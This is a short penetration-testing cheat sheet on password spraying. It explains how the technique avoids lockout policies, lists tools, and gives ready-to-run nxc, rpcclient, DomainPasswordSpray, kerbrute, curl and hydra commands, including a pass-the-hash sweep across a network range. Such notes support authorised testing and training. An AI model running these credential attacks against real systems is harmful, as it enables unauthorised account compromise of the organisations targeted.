Password spraying
Password spraying is a technique that is the most commonly used nowadays to find a working credential pair.
We select a password and test it on a list of usernames. After a delay, we repeat this step with another password. π€
Many companies have some password policy that may include account lookout after a certain number of failed attempts, which makes brute force impractical as we would lock all accounts.
Some tools you might use:
- SprayingToolkit (1.4k β, 2022 πͺ¦)
- TREVORspray (0.9k β)
- CredMaster (0.8k β)
Many network authentication tools can be used such as hydra -C.
Windows Credentials Password spraying
Leveraging SMB
You can use SMB:
$ nxc smb IP -u wordlist -p PasswordHere
$ nxc smb IP -u wordlist -p PasswordHere | grep +
$ nxc smb --local-auth CIDR -u administrator -H hash | grep +
Leveraging RPC
A very poor but straightforward RPC password spraying:
$ for u in $(cat wordlist);do rpcclient -U "$u%PasswordHere" -c "getusername;quit" IP | grep Authority; done
Leveraging A Domain-joined Host
You may use DomainPasswordSpray (1.6k β):
PS> Import-Module .\DomainPasswordSpray.ps1
PS> Invoke-DomainPasswordSpray -Password PasswordHere -OutFile output.txt -ErrorAction SilentlyContinue
Leveraging Kerberos Authentication Module
We can use kerbrute:
$ kerbrute passwordspray -d domain --dc IP valid_users.txt mypassword
HTTP LDAP Credentials Password spraying
We can use curl to test a pair of credentials:
$ curl URL -u "username:password" --ntlm
We can also use tools such as hydra:
$ hydra -L usernames.txt -p password example.com http-get
π» To-do π»
Stuff that I found, but never read/used yet.